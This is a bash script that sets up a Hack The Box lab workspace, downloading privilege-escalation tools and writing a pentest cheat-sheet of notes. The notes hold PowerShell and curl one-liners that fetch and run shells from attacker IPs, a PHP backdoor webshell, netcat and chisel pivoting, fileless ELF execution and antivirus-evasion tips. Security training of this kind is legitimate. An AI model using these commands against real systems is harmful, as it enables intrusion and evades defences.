#!/bin/bash
# to run type '. /directory/setup'
# set box name, IP and ostype
#for folder in $(ls /opt/); do cd /opt/$folder/; sudo git pull; done

BOXNAME=Extension
LAST=171
OS=linux

export IP=10.10.11.$LAST                           #enter box IP
export SELF=`hostname -I | awk '{print $2}'`
export HOME=/home/kali/hackthebox/$BOXNAME          #enter box Name
export SELF=$(hostname -I | awk '{print$2}')

#start obsidian in background and push errors/output to /dev/null will need to copy .config/obsidian to folder or something to make it load the working directory but will figure out later...
#and uhh.. doesn't load the newest version.. for some reason will add to notes to get it going may be just copying the vaults to show the vaults the .config/obsidian/obsidian.json but will play with later.. 
# the current working vault = 
#/opt/obsidian/Obsidian-0.11.5.AppImage &>/dev/null &

read "?Press [Enter] key if this is first run"
read "?Are you sure this is the first run?"
## Bash add pause prompt for 5 seconds ##
read -t 5 "?I am going to wait for 5 seconds only ..."

#only run if first time or will lose all work
mkdir $HOME
mkdir $HOME/nmap
mkdir $HOME/buster
mkdir $HOME/www
mkdir $HOME/$BOXNAME
touch $HOME/notes
touch $HOME/.hushlogin

# copy windows specif scripts to windows box or linux specific to linux box
cp /opt/Scripts/auto_stabilize_shell.sh $HOME/
cp /opt/Scripts/.bashrc $HOME/
cp /opt/Scripts/.bash_aliases $HOME/
cp /opt/Scripts/.tmux.conf $HOME/
cp /opt/Scripts/.zshrc $HOME/

if [[ "$OS" == "win" ]]; then

    #curl -s -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -o $HOME/www/winPEASany.exe
    #curl -s -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat -o $HOME/www/winPEAS.bat
    curl -s -L https://github.com/carlospolop/PEASS-ng/releases/download/20220930/winPEASx64.exe -o $HOME/www/winpeasx64.exe
    curl -s -L https://github.com/carlospolop/PEASS-ng/releases/download/20220930/winPEASany.exe -o $HOME/www/winpeasany.exe
    #cp /opt/PEASS-ng/winPEAS/winPEASexe/binaries/Release/winPEASany.exe $HOME/www
    #cp /opt/PEASS-ng/winPEAS/winPEASbat/winPEAS.bat $HOME/www
    #cp /usr/share/windows-resources/binaries/netcat32/netcat-1.11/nc64.exe $HOME/www
    cp /usr/share/windows-resources/binaries/nc.exe $HOME/www
else
    curl -s -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o $HOME/www/linpeas.sh
    curl -s -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64 -o $HOME/www/linpeas_linux_amd64
    #cp /opt/PEASS-ng/linPEAS/linpeas.sh $HOME/www/
    curl -s -L https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s -o $HOME/www/pspy64s
fi
chmod +x $HOME/www/*


# Build notes
echo '# Standard enumration' >> $HOME/notes
echo '#export IP='$IP > $HOME/notes
echo '#masscan -p1-65535,U:1-65535 $IP --rate=1000 -e tun0' >> $HOME/notes
echo '#nmap -sC -sV -p- -vvv -oN $HOME/nmap/Initial $IP' >> $HOME/notes
echo '#gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt -s 200 -x php,html,txt,xml,sh,py -o buster/80dir.log' >> $HOME/notes
echo '#gobuster dir -u http://$IP/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o buster/root.log' >> $HOME/notes
echo '#gobuster dir -u http://$IP/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt -o buster/root_files.log' >> $HOME/notes
echo '#gobuster vhosts -u http://$BOXNAME.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o buster/vhosts.log' >> $HOME/notes
echo '#gobuster dns domain.com -o buster/dom.log' >> $HOME/notes
# Try nikto
echo "" >> $HOME/notes
echo "# nikto" >> $HOME/notes
echo "nikto -h $IP" >> $HOME/notes
echo "add machine name domain.htb to /etc/hosts (search to ensure named correct)" >> $HOME/notes
echo "nikto -h domain.htb" >> $HOME/notes
# To fix copy and paste problems in Virtual box
echo "" >> $HOME/notes
echo "# when in virtual Machine" >> $HOME/notes
echo "any problems kill VBoxClient clipboard etc." >> $HOME/notes
# Windows shells
echo "" >> $HOME/notes
echo '# Windows Shells' >> $HOME/notes
echo 'echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10:8080/shell.ps1')" | iconv --to-code UTF16LE | base64 -w0' >> $HOME/notes
echo 'powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.155/winPEAS.bat', 'C:\temp\winPEAS.bat')"' >> $HOME/notes
echo 'IWR http://10.10.10.10/shell.exe -OutFile shell.exe' >> $HOME/notes
echo 'cp /usr/share/webshells/php/simple-backdoor.php .' >> $HOME/notes

# Cool way to pivot/scan
echo "" >> $HOME/notes
echo "# really cool way to pivot/scan with nc" >> $HOME/notes
echo "mkfifo reply" >> $HOME/notes
echo "nc -klvnp 65535 < reply | nc 127.0.0.1 6739 > reply" >> $HOME/notes
echo "(nc -klvnp <port to use> < reply | nc 127.0.0.1 <port interested in scanning etc> > reply)" >> $HOME/notes
echo "(dont forget to rm reply)" >> $HOME/notes
echo "Then can just scan port 6379 through 65535 etc." >> $HOME/notes
echo "to scan ports with busybox/nc nc -z -v -w 1 192.168.0.1 80" >> $HOME/notes

# More ways to pivot
echo "" >> $HOME/notes
echo "# More ways to pivot" >> $HOME/notes
echo "9510 and other ports through chisel" >> $HOME/notes
echo "# On Kali" >> $HOME/notes
echo "kali@kali:~$ ./chisel server -p 9002 --reverse  " >> $HOME/notes
echo "# On Windows" >> $HOME/notes
echo "./chisel client 10.10.14.128:9002 R:8080:localhost:8080 R:9510:localhost:9510 R:9512:localhost:9512" >> $HOME/notes
echo "# if using metasploit" >> $HOME/notes
echo "portfwd add -l 9510 -p 9510 -r 10.10.11.115" >> $HOME/notes

# Windows Sharp Binaries
echo "" >> $HOME/notes
echo "# Windows Sharp Binaries" >> $HOME/notes
echo "check this out - git clone https://github.com/Flangvik/SharpCollection.git for windows sharp binaries" >> $HOME/notes

# Run Obsidian in background
echo "" >> $HOME/notes
echo "# Run Obsidian" >> $HOME/notes
echo "/opt/obsidian/Obsidian-0.15.9.AppImage &>/dev/null &" >> $HOME/notes

# AntiVirus Evasion
echo "" >> $HOME/notes
echo "# Anti Virus Evasion" >> $HOME/notes
echo "## Nishang" >> $HOME/notes
echo "for nishang antivirus evasion, just replace the Invoke-PowershellTcp with anything" >> $HOME/notes
echo "and replace sendback with anything, and it should replace sendback and sendback2" >> $HOME/notes
echo "and for the oneliner, split it to individual lines after every semicolon (;) , or just at after the {0};" >> $HOME/notes 
echo "## Conptyshell" >> $HOME/notes
echo "for conpty shell replace the name invoke-conptyshell and conptyshell and remove the how to use section" >>$HOME/notes
# Fileless elf execution
echo "" >> $HOME/notes
echo "# Fileless elf execution" >> $HOME/notes
echo "curl http://10.10.14.178/ls.b64 |bash <(curl http://10.10.14.178/ddexec.sh) /bin/test -al" >> $HOME/notes

# Build obsidian files for not keeping
# Cover page
echo '<p align="center">' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo '  <img  width=1024 src="" />' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo '</p>' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo ' ' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo '# Path of Exploitation' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo 'Foothold:' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo 'User:'  >> $HOME/$BOXNAME/000\ -\ Cover.md
echo 'root:' >> $HOME/$BOXNAME/000\ -\ Cover.md
echo ' ' >> $HOME/$BOXNAME/000\ -\ Cover.md
# loot page
echo '# Creds' >> $HOME/$BOXNAME/00\ -\ Loot.md
echo '| Username | Password | Description |' >> $HOME/$BOXNAME/00\ -\ Loot.md
echo '| --- | --- | -- |' >> $HOME/$BOXNAME/00\ -\ Loot.md
echo '| | | |' >> $HOME/$BOXNAME/00\ -\ Loot.md
# Nmap page
echo '# Nmap' >> $HOME/$BOXNAME/05\ -\ Nmap.md
echo '| Port | Service | Description |' >> $HOME/$BOXNAME/05\ -\ Nmap.md
echo '| --- | --- | --- |' >> $HOME/$BOXNAME/05\ -\ Nmap.md
echo '| 22 | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |' >> $HOME/$BOXNAME/05\ -\ Nmap.md
echo '| 80 | http | |' >> $HOME/$BOXNAME/05\ -\ Nmap.md
echo '| | | |' >> $HOME/$BOXNAME/05\ -\ Nmap.md
echo ' '
echo 'Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel' >> $HOME/$BOXNAME/05\ -\ Nmap.md
# Web enumeration page
echo '# Web Enumeration' >> $HOME/$BOXNAME/10\ -\ Web\ Enumeration.md

# View notes
cat $HOME/notes
